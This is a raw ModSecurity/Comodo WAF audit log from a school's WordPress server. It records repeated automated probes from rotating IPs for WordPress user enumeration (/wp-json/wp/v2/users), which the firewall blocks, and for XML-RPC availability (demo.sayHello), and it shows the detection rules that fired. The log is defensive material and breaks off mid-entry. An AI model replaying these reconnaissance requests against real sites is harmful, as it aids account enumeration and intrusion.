1747442506866361 5773 (- - -) Stopwatch2: 1747442506866361 5773; combined=4068, p1=539, p2=3284, p3=38, p4=44, p5=98, sr=69, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --902d8f49-Z-- --5c18891f-A-- [17/May/2025:07:41:50 +0700] aCfbThKi5m5upc8uMd6h1gAAAM0 103.236.140.4 43022 103.236.140.4 8181 --5c18891f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5c18891f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c18891f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442510499765 2103 (- - -) Stopwatch2: 1747442510499765 2103; combined=1030, p1=344, p2=660, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c18891f-Z-- --49a39214-A-- [17/May/2025:07:41:52 +0700] aCfbUHyxdQCiyU1ENFcnLgAAAAc 103.236.140.4 43026 103.236.140.4 8181 --49a39214-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --49a39214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49a39214-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442512724319 2004 (- - -) Stopwatch2: 1747442512724319 2004; combined=1009, p1=320, p2=660, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49a39214-Z-- --84c2b033-A-- [17/May/2025:07:41:56 +0700] aCfbVHyxdQCiyU1ENFcnMAAAAAo 103.236.140.4 43032 103.236.140.4 8181 --84c2b033-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --84c2b033-C-- demo.sayHello --84c2b033-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84c2b033-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442516158729 6092 (- - -) Stopwatch2: 1747442516158729 6092; combined=4733, p1=605, p2=3824, p3=98, p4=43, p5=98, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84c2b033-Z-- --ccc33203-A-- [17/May/2025:07:42:00 +0700] aCfbWHyxdQCiyU1ENFcnMwAAABA 103.236.140.4 43038 103.236.140.4 8181 --ccc33203-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ccc33203-C-- demo.sayHello --ccc33203-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccc33203-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442520201074 4243 (- - -) Stopwatch2: 1747442520201074 4243; combined=3327, p1=422, p2=2728, p3=21, p4=22, p5=79, sr=64, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccc33203-Z-- --ece8f102-A-- [17/May/2025:07:42:14 +0700] aCfbZnyxdQCiyU1ENFcnNQAAAA8 103.236.140.4 43042 103.236.140.4 8181 --ece8f102-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ece8f102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ece8f102-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442534760527 3016 (- - -) Stopwatch2: 1747442534760527 3016; combined=1375, p1=458, p2=887, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ece8f102-Z-- --fc7eb661-A-- [17/May/2025:07:42:23 +0700] aCfbb3yxdQCiyU1ENFcnNgAAABI 103.236.140.4 43046 103.236.140.4 8181 --fc7eb661-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc7eb661-C-- demo.sayHello --fc7eb661-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc7eb661-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442543022453 6577 (- - -) Stopwatch2: 1747442543022453 6577; combined=4764, p1=609, p2=3910, p3=40, p4=44, p5=97, sr=82, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc7eb661-Z-- --9df0b051-A-- [17/May/2025:07:45:22 +0700] aCfcInyxdQCiyU1ENFcnOQAAABg 103.236.140.4 43066 103.236.140.4 8181 --9df0b051-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9df0b051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9df0b051-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442722889656 3137 (- - -) Stopwatch2: 1747442722889656 3137; combined=1346, p1=459, p2=857, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9df0b051-Z-- --fe711b5b-A-- [17/May/2025:07:45:31 +0700] aCfcK3yxdQCiyU1ENFcnOgAAAAA 103.236.140.4 43070 103.236.140.4 8181 --fe711b5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe711b5b-C-- demo.sayHello --fe711b5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe711b5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442731202653 5097 (- - -) Stopwatch2: 1747442731202653 5097; combined=3884, p1=488, p2=3189, p3=26, p4=27, p5=91, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe711b5b-Z-- --f4255275-A-- [17/May/2025:07:54:21 +0700] aCfePXyxdQCiyU1ENFcnTwAAABY 103.236.140.4 43158 103.236.140.4 8181 --f4255275-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f4255275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4255275-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443261753624 3419 (- - -) Stopwatch2: 1747443261753624 3419; combined=1418, p1=485, p2=900, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4255275-Z-- --d6a27b6b-A-- [17/May/2025:07:54:30 +0700] aCfeRnyxdQCiyU1ENFcnUAAAABg 103.236.140.4 43162 103.236.140.4 8181 --d6a27b6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d6a27b6b-C-- demo.sayHello --d6a27b6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6a27b6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443270273880 6521 (- - -) Stopwatch2: 1747443270273880 6521; combined=4736, p1=611, p2=3879, p3=42, p4=42, p5=97, sr=96, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6a27b6b-Z-- --41c5081a-A-- [17/May/2025:07:55:35 +0700] aCfeh3yxdQCiyU1ENFcnUgAAABc 103.236.140.4 43166 103.236.140.4 8181 --41c5081a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41c5081a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41c5081a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443335389191 3301 (- - -) Stopwatch2: 1747443335389191 3301; combined=1456, p1=484, p2=938, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41c5081a-Z-- --6c376422-A-- [17/May/2025:07:55:40 +0700] aCfejHyxdQCiyU1ENFcnVAAAAAQ 103.236.140.4 43170 103.236.140.4 8181 --6c376422-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c376422-C-- demo.sayHello --6c376422-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c376422-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443340980042 4789 (- - -) Stopwatch2: 1747443340980042 4789; combined=3726, p1=472, p2=3054, p3=23, p4=25, p5=90, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c376422-Z-- --b2339b10-A-- [17/May/2025:07:56:13 +0700] aCferQTOsBn9MSWb6WJt-QAAAIw 103.236.140.4 43174 103.236.140.4 8181 --b2339b10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2339b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2339b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443373851516 3073 (- - -) Stopwatch2: 1747443373851516 3073; combined=1273, p1=428, p2=815, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2339b10-Z-- --02a5e535-A-- [17/May/2025:07:56:19 +0700] aCfes3yxdQCiyU1ENFcnVwAAAAk 103.236.140.4 43178 103.236.140.4 8181 --02a5e535-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02a5e535-C-- demo.sayHello --02a5e535-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02a5e535-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443379855331 5482 (- - -) Stopwatch2: 1747443379855331 5482; combined=4144, p1=505, p2=3356, p3=97, p4=62, p5=73, sr=76, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02a5e535-Z-- --42b6e95c-A-- [17/May/2025:07:57:14 +0700] aCfe6nyxdQCiyU1ENFcnWAAAAAo 103.236.140.4 43182 103.236.140.4 8181 --42b6e95c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --42b6e95c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42b6e95c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443434358046 3300 (- - -) Stopwatch2: 1747443434358046 3300; combined=1448, p1=504, p2=912, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42b6e95c-Z-- --72b4d461-A-- [17/May/2025:07:57:21 +0700] aCfe8XyxdQCiyU1ENFcnWgAAAAw 103.236.140.4 43186 103.236.140.4 8181 --72b4d461-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72b4d461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72b4d461-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443441645910 1957 (- - -) Stopwatch2: 1747443441645910 1957; combined=1008, p1=336, p2=644, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72b4d461-Z-- --48c0ef20-A-- [17/May/2025:07:57:22 +0700] aCfe8nyxdQCiyU1ENFcnWwAAAA0 103.236.140.4 43188 103.236.140.4 8181 --48c0ef20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48c0ef20-C-- demo.sayHello --48c0ef20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c0ef20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] 